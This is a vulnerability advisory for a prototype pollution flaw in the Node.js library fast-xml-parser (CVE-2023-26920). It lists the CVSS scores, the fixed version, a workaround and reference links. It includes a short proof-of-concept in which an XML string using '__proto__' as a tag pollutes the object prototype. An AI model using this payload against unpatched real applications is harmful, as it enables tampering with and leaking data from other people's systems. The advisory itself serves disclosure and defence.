CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
27.5%
As a part of this vulnerability, user was able to se code using __proto__
as a tag or attribute name.
const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");
let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>"
const parser = new XMLParser();
let jObj = parser.parse(XMLdata);
console.log(jObj.polluted) // should return hacked
The problem has been patched in v4.1.2
User can check for “proto” in the XML string before parsing it to the parser.
https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
Vendor | Product | Version | CPE |
---|---|---|---|
fast-xml-parser_project | fast-xml-parser | * | cpe:2.3:a:fast-xml-parser_project:fast-xml-parser:*:*:*:*:*:node.js:*:* |
gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
github.com/advisories/GHSA-793h-6f7r-6qvm
github.com/advisories/GHSA-x3cc-x39p-42qx
github.com/NaturalIntelligence/fast-xml-parser/commit/2b032a4f799c63d83991e4f992f1c68e4dd05804
github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-x3cc-x39p-42qx
nvd.nist.gov/vuln/detail/CVE-2023-26920